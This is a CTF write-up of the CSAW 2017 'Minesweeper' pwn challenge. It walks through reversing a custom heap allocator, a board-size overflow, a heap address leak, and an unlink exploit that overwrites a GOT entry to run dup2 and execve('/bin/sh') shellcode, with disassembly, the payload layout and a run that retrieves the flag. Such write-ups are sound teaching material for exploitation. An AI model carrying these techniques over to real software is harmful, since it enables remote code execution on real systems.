CSAW '17 PWN - Minesweeper (500pt)

September 25 2017

This was the highest point PWN challenge of the CTF, and was a very fun little challenge! I spent a lot of time reversing it in IDA - amending structs so that they made sense to me, because at this time of the CTF I was very tired!

The challenge description did not have any flavor text! Very disappointing!

Anyway getting on to checksec I see that it is a 32bit binary this time, with RWX segments!

[*] '/home/glenn/Downloads/csaw/csaw17/minesweeper/minesweeper'
    Arch:     i386-32-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
    RWX:      Has RWX segments

The RWX segments screams shellcode in a region such as the heap, we will have to continue on to find out! Literally no security precautions so this is an exploit dev's playground.

Now, let's play with the binary and get an understanding of the functionality. Running it, I am presented with the following message:

Server started

I didn't want to start reversing just yet, so to figure out what port the binary was listening on I just ran it through strace.

socket(PF_INET, SOCK_STREAM, IPPROTO_TCP) = 3
setsockopt(3, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0
bind(3, {sa_family=AF_INET, sin_port=htons(31337), sin_addr=inet_addr("0.0.0.0")}, 16) = 0
listen(3, 20)

So port 31337, connecting to this in another terminal with netcat I get presented with the following menu:

Hi. Welcome to Minesweeper. Please select an option:
1) N (New Game)
2) Initialize Game(I)
3) Q (Quit)

And the gist of the functionality is that you can Initialize a game, allowing you to provide an x and y size of the minefield game board, and then it will ask you to provide the contents of the game board as x*y characters with at least one 'X', resembling the mine.

When selecting to play a New Game from the menu, you can choose to View the board (V) or to guess the location of a mine using x and y coordinates (U).

Understanding the allocator

The overflow

After reading through the code for a while in IDA, renaming structs, variables, and functions; I was able to find the vulnerability.

The vulnerability lies in init_game() function, after the user has provided the x and y size of the grid array they wanted to create. After checks have been performed to ensure that the board size was sane, the program then goes and allocates memory using a custom allocator that I have renamed my_malloc. I will go into how this works soon, as another vulnerability lies in here. Anyway the following is the disassembly of the game board creation.

.text:080493E6 ; 122:     grid = my_malloc((x_size - 1) * (y_size - 1));
.text:080493E6                 mov     eax, [ebp+x_size]
.text:080493E9                 lea     edx, [eax-1]
.text:080493EC                 mov     eax, [ebp+y_size]
.text:080493EF                 sub     eax, 1
.text:080493F2                 imul    eax, edx
.text:080493F5                 sub     esp, 0Ch
.text:080493F8                 push    eax        ; user_desired_size
.text:080493F9                 call    my_malloc

As can be seen above, when creating the board - an allocation for (x-1)*(y-1) is made. This is incorrect as the correct allocation for the requested board size should be x*y.

To make this oh so sweeter, checking the code further down that actually does the reading of the board content from the user, we can confirm this.

.text:080494AC ; 133: v8 = custom_read(fd, grid, y_size * x_size + 1);
.text:080494AC                 add     esp, 10h
.text:080494AF                 mov     eax, [ebp+x_size]
.text:080494B2                 imul    eax, [ebp+y_size]
.text:080494B6                 add     eax, 1
.text:080494B9                 sub     esp, 4
.text:080494BC                 push    eax  ; y_size * x_size + 1
.text:080494BD                 push    [ebp+grid]   ; grid
.text:080494C0                 push    [ebp+fd]     ; fd
.text:080494C3                 call    custom_read

There we go, so we allocate room for (x-1)*(y-1) and we actually read in (x*y-1). Now to see how we can actually exploit this we need to look into the my_malloc function to see how it is actually working.

my_malloc

The first thing that my_malloc does is convert the value that is passed into my_malloc as an argument. The reason this is done is to convert into a custom size value that the allocator uses instead of the number of bytes the user wants.

.text:08049891 ; 9:   desired_len = (user_desired_size + 11) / 12u + 1;
.text:08049891                 mov     [ebp+new_node], 0
.text:08049898                 mov     eax, [ebp+user_desired_size]
.text:0804989B                 add     eax, 0Bh
.text:0804989E                 mov     edx, 0AAAAAAABh
.text:080498A3                 mul     edx
.text:080498A5                 mov     eax, edx
.text:080498A7                 shr     eax, 3
.text:080498AA                 add     eax, 1
.text:080498AD                 mov     [ebp+desired_len], eax

When the custom allocator is first run on an initial allocation (for a cowsay message!) it checks a global free_list_ptr to see if it is NULL, if it is then it sets this pointer to the bss section variable free_list, and initializes the linked list head by setting a 0 size and the forward and backward pointers to point to itself.

.text:080498B0 ; 10:   if ( !free_list_ptr )
.text:080498B0                 mov     eax, ds:free_list_ptr
.text:080498B5                 test    eax, eax
.text:080498B7                 jnz     short loc_80498E9
.text:080498B9 ; 12:     free_list_ptr = free_list;
.text:080498B9                 mov     ds:free_list_ptr, offset free_list
.text:080498C3 ; 13:     LOWORD(free_list[0].size) = 0;
.text:080498C3                 mov     eax, ds:free_list_ptr
.text:080498C8                 mov     word ptr [eax], 0
.text:080498CD ; 14:     free_list[0].next = free_list;
.text:080498CD                 mov     eax, ds:free_list_ptr
.text:080498D2                 mov     edx, ds:free_list_ptr
.text:080498D8                 mov     [eax+4], edx
.text:080498DB ; 15:     free_list_ptr->prev = free_list_ptr;
.text:080498DB                 mov     eax, ds:free_list_ptr
.text:080498E0                 mov     edx, ds:free_list_ptr
.text:080498E6                 mov     [eax+8], edx

After this, the allocator then loops through the freelist, looking for a chunk that is greater than or equal to the transformed size the user is after.

  for ( i = free_list_ptr->next; i != free_list_ptr; i = i->next )
  {
    if ( LOWORD(i->size) >= desired_len )
    {
      chosen_node = i;
      break;
    }
  }

If it was successful in finding a chunk that was exactly the size needed, it delinks the chunk it found from the freelist and returns this to the user. I will come back to how the delink_node() function works later.

  if ( chosen_node && LOWORD(chosen_node->size) == desired_len )// the size exactly matches
  {
    delink_node(chosen_node);
    return (char *)&chosen_node[1];
  }

The interesting thing about this is the fact that it returns (char *)&chosen_node[1];. Having a look at the disassembly will make this more clear.

.text:0804993E ; 28:     return (char *)&chosen_node[1];
.text:0804993E                 add     esp, 10h
.text:08049941                 mov     eax, [ebp+chosen_node]
.text:08049944                 add     eax, 0Ch
.text:08049947                 jmp     locret_8049A08

What you can see here is that the allocator moves the address of the stack variable chosen_node into eax, then adds 0xC to this value and then jumps to the return address. The reason it adds 12 to the chosen_node address is because the meta-data is actually stored in the node! The structure of the meta-data is as follows.

struct list_struct {
    DWORD size;
    struct list_struct *next;
    struct list_struct *prev;
}

So this meta-data occupies 12 bytes in total, and sits in front of the actual data in the chunk. Continuing on with the allocator we check to see if we didn't find a chunk that was even just greater than what we wanted to allocate, meaning the freelist was empty or all chunks in the freelist are too small (the allocator does not consolidate).

  if ( !chosen_node )
  {
    old_heap_base = (list_struct *)sbrk(4096);
    if ( old_heap_base == (list_struct *)-1 )
      return (char *)-1;
    chosen_node = old_heap_base;
    LOWORD(old_heap_base->size) = 341;
  }

If this is the case, then we call sbrk extending the stack 4096 bytes and returning this address. What we then do is assign this to the current_node stack variable and set the size attribute, so we can use this further down in the code. You can see the custom size coming into play here, assigning 341 as the size to the 4096 byte allocation in the block meta-data.

The final part of the allocator does a few things. Pseudo code:

  if ( chosen_node && LOWORD(chosen_node->size) > desired_len )
  {
    LOWORD(chosen_node[desired_len].size) = LOWORD(chosen_node->size) - desired_len;// reduce size of big chunk
    LOWORD(chosen_node->size) = desired_len;
    if ( chosen_node->next )  // if found one above that was too big
    {
      if ( chosen_node->prev )
        delink_node(chosen_node);
    }
    link_node(&chosen_node[desired_len]);
    result = (char *)&chosen_node[1];
  }
  else
  {
    result = (char *)-1;
  }
  return result;

So what is happening here, is chosen_node contains a chunk we found that was bigger than the desired size in the freelist, or the new one that was allocated by sbrk. What then happens is the chosen_node is split into the chunk with size we desire, and the remainder chunk. What this means is that chunks are all contiguous blocks of data in the heap! (Since we used sbrk).

We then assign the size of the remainder chunk to the old size minus the size the user desires. If chosen_node was a node that was on the freelist and not one that was allocated via sbrk (it checks this by seeing if the next and prev pointers are NULL) then it delinks it from the freelist. Then, regardless of how current_node was obtained, the allocator links the remainder node into the freelist (by offsetting desired_len into chosen_node), and then returns chosen_node which is now of desired size to the user, in the same fashion as it did earlier.

Woohoo! We now understand how the allocator works. Now let us have a look at the delink_node code to see the vulnerability.

The meat of the delink_node() function is as follows.

.text:0804983A ; 5:   chosen_node->next->prev = chosen_node->prev;
.text:0804983A                 mov     eax, [ebp+chosen_node]
.text:0804983D                 mov     eax, [eax+8]
.text:08049840 ; 4:   old_next = chosen_node->next;
.text:08049840                 mov     [ebp+prev_thing], eax
.text:08049843                 mov     eax, [ebp+chosen_node]
.text:08049846                 mov     eax, [eax+4]
.text:08049849                 mov     [ebp+next_thing], eax
.text:0804984C                 mov     eax, [ebp+chosen_node]
.text:0804984F                 mov     eax, [eax+4]
.text:08049852                 mov     edx, [ebp+prev_thing]
.text:08049855                 mov     [eax+8], edx
.text:08049858 ; 6:   chosen_node->prev->next = old_next;
.text:08049858                 mov     eax, [ebp+chosen_node]
.text:0804985B                 mov     eax, [eax+8]
.text:0804985E                 mov     edx, [ebp+next_thing]
.text:08049861                 mov     [eax+4], edx

What it is doing here, is simply setting the next and prev pointers of the node passed in as an argument to the prev and next pointers of the nodes that surround it in the freelist.

This is a classic unlink exploit! Also no checks are done to ensure that the prev pointer of the next node of the chosen_node point to the chosen_node, and the same for prev. So this makes it easy!

So if we can get GOT_address - 8 into the next attribute of a chunk meta-data and the address of some shellcode into the prev attribute, and call delink_node() on this node, then we will write shellcode_address into GOT_address and GOT_address - 8 into shellcode_address + 4.

We can see before in the last chunk of code in my_malloc that delink_node() is only called if the block contains data in the prev and next attributes of the chunk meta-data. If we were to overflow from one chunk to the next contiguous chunk, and then make another allocation (which is the case when allocating memory for the grid board - and then the program makes an allocation for some space to store text in to print out) then when the allocator goes to delink this new allocation (for the text to print out, after the grid was allocated) then the delink write primitive will trigger!

Incorrect sizing to data overflow

Since the allocation differences between what the user inputs, what the program allocates and what the program prompts for reading are so different I wrote some python to help figure it all out.

for i in range(0, 10):
    print(f"{i}x{i}={i*i} and custom_size={int((((i-1)*(i-1))+11)/12) + 1} and grid_size={(i-1)*(i-1)} and grid_size_useable={(i-1)*(i-1)-12} and read_amount={i*i+1}")

In the below rows; custom_size is the converted size value that my_malloc uses, grid_size is the size of the grid that the program thinks it is allocating, grid_size_useable is the size of the returned data chunk which is actually usable (minus the meta-data) and read_amount is the amount that is actually read in by the user.

0x0=0 and custom_size=2 and grid_size=1 and grid_size_useable=-11 and read_amount=1
1x1=1 and custom_size=1 and grid_size=0 and grid_size_useable=-12 and read_amount=2
2x2=4 and custom_size=2 and grid_size=1 and grid_size_useable=-11 and read_amount=5
3x3=9 and custom_size=2 and grid_size=4 and grid_size_useable=-8 and read_amount=10
4x4=16 and custom_size=2 and grid_size=9 and grid_size_useable=-3 and read_amount=17
5x5=25 and custom_size=3 and grid_size=16 and grid_size_useable=4 and read_amount=26
6x6=36 and custom_size=4 and grid_size=25 and grid_size_useable=13 and read_amount=37
7x7=49 and custom_size=4 and grid_size=36 and grid_size_useable=24 and read_amount=50
8x8=64 and custom_size=6 and grid_size=49 and grid_size_useable=37 and read_amount=65
9x9=81 and custom_size=7 and grid_size=64 and grid_size_useable=52 and read_amount=82

As can be seen (ignoring negative values) that we have some serious overflows due to the amount that can be read in, and the amount the program thinks it has allocated. We can use this soon to overflow chunk meta-data!

Leaking data

After playing around with the functionality through an interactive pwntools session with debug mode on, I was able to find a reliable leak for a heap address.

Using a board sizing of 8 x 8 I was able to leak a lot of data, which contained a heap address. Since a board size of 8 x 8 allows a max of 65 characters for the board (see section above) I sent in 64 X's and the newline was the 65th character.

By the starting a new game and viewing the board (V) I got the following data returned.

[DEBUG] Received 0x99 bytes:
    00000000  58 58 58 58  58 58 58 58  0a 58 58 58  58 58 58 58  │XXXX│XXXX│·XXX│XXXX│
    00000010  58 0a 58 58  58 58 58 58  58 58 0a 58  58 58 58 58  │X·XX│XXXX│XX·X│XXXX│
    00000020  58 58 58 0a  58 58 58 58  58 58 58 58  0a 58 58 58  │XXX·│XXXX│XXXX│·XXX│
    00000030  58 58 58 58  58 0a 58 58  58 58 58 58  58 58 0a 58  │XXXX│X·XX│XXXX│XX·X│
    00000040  58 58 58 12  00 58 58 0a  38 71 a6 09  00 70 a6 09  │XXX·│·XX·│8···│····│
    00000050  0a 5f 5f 5f  5f 5f 5f 5f  5f 0a 5f 5f  5f 5f 0a 3c  │·___│____│_·__│__·<│
    00000060  20 63 0a 6f  77 73 61 79  20 3c 33 0a  20 6d 69 6e  │ c·o│wsay│ <3·│ min│
    00000070  65 73 77 65  0a 65 70 65  72 20 3e 0a  20 0a 2d 2d  │eswe│·epe│r >·│ ·--│
    00000080  2d 2d 2d 2d  2d 2d 0a 2d  2d 2d 2d 20  20 20 20 0a  │----│--·-│--- │   ·│
    00000090  20 20 20 20  20 20 0a 20  0a                        │    │  · │·│
    00000099

And you can see heap address leaks at 0x48 and 0x4C offset into the returned data.

Now using GDB (as radare was giving me weird behavior due to the socket trickery), instead of 64 X's, I started the board data with an egg I would then search for in memory.

hacktheplanetXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

And then searching for this egg, which was at the start of the data section of the chunk I just created indirectly in the allocator - I found the offset between its address and the address I leaked out above in the view board action at offset 0x48.

Program received signal SIGINT
pwndbg> search hacktheplanet
[heap]          0x9a67024 0x6b636168 ('hack')
pwndbg> distance 0x9a67024 0x9a67138
0x9a67024->0x9a67138 is 0x114 bytes (0x45 words)

Hence there is an offset of 0x114 bytes from the address I leak out of the view board action at offset 0x48 into the leak, and the start of the data I provide when creating the board.

The exploit

Now that we have a heap leak and a write primitive we can get started!
To test the write primitive I used a 7 x 7 grid and followed the sizing issues rules I showed above.

The grid contents: SSSS is shellcode address and XXXX is GOT-8. YY is just to pad to the size of the full read.

In [1]: 'A'*40+'XXXX'+'SSSS'+'YY'
Out[1]: 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAXXXXSSSSYY'

This gives the following outcome during debugging, when entering the delink_node function.
Screen-Shot-2017-09-25-at-5.46.22-pm

You can see it is trying to write SSSS into XXXX + 8, which gdb stops execution and claims a fault - as it should. This is exactly what we want, except we want SSSS to be the address of the shellcode we leaked earlier, and XXXX to be the address of fwrite - 8 in the GOT.

The reason that we want to overwrite fwrite in the GOT, is that it is called immediately after the unlink has occurred in delink_node(). So we can get the shell then and there.

Our shellcode gets fwrite - 8 written into it 4 bytes in, so at the start of the shellcode we have to have a relative jump to jump over it. No problem!

By doing all this we run into an issue, when the shellcode runs (and it does!) and we spawn an interactive pwntools terminal, we cannot send commands or receive them - although the socket remains live. The reason is that when the minesweeper binary forks when a connection to come in to run the actual challenge code - the communications are written to and received over a socket - and if you debug you find it is file descriptor 0x4. Thus when we try to ls or cat flag - the challenge is not actually receiving this!

To solve this, we must run shellcode that performs dup2 on stdin and stdout with the socket file descriptor (0x4). This will connect stdin and stdout with the socket the challenge is communicating over such that we can send commands and receive output.

So the final shellcode must be:

  1. jump over unlink() overwrite that is 4 bytes in and lasts 4 bytes
  2. run dup2 on stdin and stdout (stderr is optional)
  3. perform normal exeve('/bin/sh') shellcode as usual

And this is demonstrated in the final exploit:

And here we go! Let's get the flag!

↳ python minesweeper.py
[+] Opening connection to pwn.chal.csaw.io on port 7478: Done
[*] Shellcode length: 54
[+] Leaked heap address: 0x9374138
[+] Shellcode address: 0x9374024
[*] Switching to interactive mode
$ ls
Makefile
flag
fork_accept.c
malloc.c
malloc.h
minesweeper
ms.c
run.sh
$ cat flag
flag{h3aps4r3fun351eabf3}

Comments